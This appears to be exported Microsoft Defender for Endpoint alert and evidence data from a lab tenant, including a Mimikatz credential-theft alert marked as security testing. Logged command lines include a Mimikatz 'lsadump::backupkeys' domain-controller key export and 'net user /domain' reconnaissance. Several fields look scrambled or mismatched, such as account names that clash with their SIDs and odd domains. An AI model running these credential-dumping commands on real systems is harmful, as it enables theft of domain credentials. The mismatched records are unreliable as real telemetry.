[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:43.66Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:43.66Z", "fileName": "nslookup.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:37.5336889Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 728, "processCommandLine": "nslookup msdxv2-dc.msdxv2.m365dpoc.com", "processCreationTime": "2022-11-21T02:01:37.5530608Z", "processId": 1716, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "9a3be34e8316ebb945a4d5818a4066c91fe98c95", "sha256": "54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:43.66Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"cmd.exe\" /c \"nslookup msdxv2-dc.msdxv2.m365dpoc.com\"", "processCreationTime": "2022-11-21T02:01:37.5336889Z", "processId": 728, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9", "sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:45.1233333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'", "processCreationTime": "2022-11-21T02:01:28.4753286Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:45.1233333Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": null, "parentProcessId": 4684, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-11-10T07:07:26.0872385Z", "processId": 4680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T16:28:43.24Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:07:46.14Z
Benign
None
ronhd
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2023-01-18T07:48:50.2433333Z
Suspicious
None
alice
null
S-1-12-1-1872666537-1245549218-2310224265-524150552
6f9e9fa9-92a2-4a3d-8939-b38918e73d1f
takeshi@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:45.04Z
Suspicious
Active
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
1,768
"net.exe" user /domain
2022-11-21T02:01:37.7396253Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638001152368929144_695584973
641d3076-7cae-4a93-830d-1b38c988e610
486
MicrosoftDefenderForEndpoint
2022-09-30T06:13:56.8929409Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:06.1839452Z
2022-09-30T06:13:06.1839452Z
Mimikatz credential theft tool
The Mimikatz hacktool was detected on this device. Mimikatz is a credential theft tool that can harvest plaintext passwords, password hashes, smartcard PINs, and Kerberos tickets. An attacker might be trying to harvest credentials to log into this or other devices on the network, by impersonating a valid user.
CredentialAccess
Resolved
High
20
TerminatedBySystem
TruePositive
SecurityTesting
WindowsDefenderAv
8cac979e-6dcc-44ad-8355-480eebaff1c1
msftadmin@msdxv2.m365dpoc.com
null
Mimikatz
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "corp.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-09-30T06:13:56.9233333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved", "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:13:51.0033333Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:19:56.9466667Z
Suspicious
None
steve
prod.env
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:13:50.9266667Z
Suspicious
None
jeff
test.domain
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:57:32.0833333Z
Suspicious
None
alice
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
4,216
PSEXESVC.exe
2022-12-22T08:47:50.8661147Z
748
2022-12-22T08:38:52.5569028Z
services.exe
C:\Windows\System32
Detected
4f111b3b2366eacdcc66d7ad73548fff9b039c15
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T04:44:35.99Z
Suspicious
None
Takeshi
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
76866dde54ee3fa5bc8efefb9d44e6bf859973aa
afbe51517092256504f797f6a5abc02515a09d603e8c046ae31d7d7855568e91
net.exe
C:\Windows\System32
17,344
ping 127.0.0.1
2022-11-18T04:38:44.7323003Z
14,616
2022-11-14T04:36:16.5242809Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
83b06aa80899050e5d4132992e36b5b8f14b64e9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:47:21.7833333Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:12:17.4466667Z
Suspicious
None
ronhd
evilcorp.cn
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:14:25.5266667Z
Suspicious
Active
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
8,844
"mimikatz.exe" privilege::debug "lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export" exit
2022-11-21T02:02:27.0051694Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2023-01-24T05:33:51.7933333Z
Suspicious
None
analyst
DIYTESTMACHINE
S-1-5-21-4215714199-1288013905-3478400915-1002
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:15:08.81Z
Suspicious
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d
8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b
explorer.exe
C:\Windows
4,668
netstat -an
2022-08-23T12:17:37.8693453Z
4,628
2022-08-23T12:17:37.5657089Z
userinit.exe
null
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T14:39:32.6833333Z
Suspicious
None
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T13:27:33.96Z
Suspicious
None
darol
lab.net
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null